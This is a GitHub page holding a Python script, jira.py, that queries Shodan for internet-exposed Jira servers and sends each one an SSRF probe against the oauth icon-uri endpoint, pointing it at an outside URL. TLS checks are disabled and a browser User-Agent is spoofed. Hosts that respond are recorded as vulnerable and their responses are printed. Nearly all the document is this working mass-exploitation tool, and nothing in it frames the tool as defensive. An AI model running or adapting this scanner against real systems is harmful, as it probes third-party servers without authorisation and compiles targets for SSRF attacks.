-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathjira.py
77 lines (61 loc) · 1.96 KB
/
jira.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#!/usr/bin/env python
#
# jira.py
# Search SHODAN for JIRA SSRF
#
# Author: random_robbie
import shodan
import sys
import re
import requests
from time import sleep
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Configuration
API_KEY = "YOURAPIKEY"
SEARCH_FOR = 'http.component:jira'
FILE = "/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.com"
session = requests.Session()
def filter_result(str):
str.strip() #trim
str.lstrip() #ltrim
str.rstrip() #rtrim
return str
def grab_file (IP,PORT,FILE):
print ("[*] Testing: "+IP+" on Port: "+PORT+"[*]\n")
try:
URL = "https://"+IP+":"+PORT+""+FILE+""
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Upgrade-Insecure-Requests":"1"}
response = session.get(URL, headers=headers, timeout=15, verify=False)
result = response.text
if '/images/branding/product' in result:
text_file = open("./cfg/jira.cfg", "a")
text_file.write("https://"+IP+":"+PORT+"\n")
text_file.close()
print ("[*] Jira... Found [*]\n")
print (result)
else:
print ("[*] Not Vulnerable [*]\n ")
except KeyboardInterrupt:
print ("Ctrl-c pressed ...")
sys.exit(1)
except Exception as e:
print (e)
print ("[*] Nothing Found on IP:"+IP+" [*]\n")
try:
# Setup the api
api = shodan.Shodan(API_KEY)
# Perform the search
result = api.search(SEARCH_FOR)
# Loop through the matches and print each IP
for service in result['matches']:
IP = service['ip_str']
PORT = str(service['port'])
CC = service['location']['country_name']
grab_file (IP,PORT,FILE)
except KeyboardInterrupt:
print ("Ctrl-c pressed ...")
sys.exit(1)
except Exception as e:
print('Error: %s' % e)
sys.exit(1)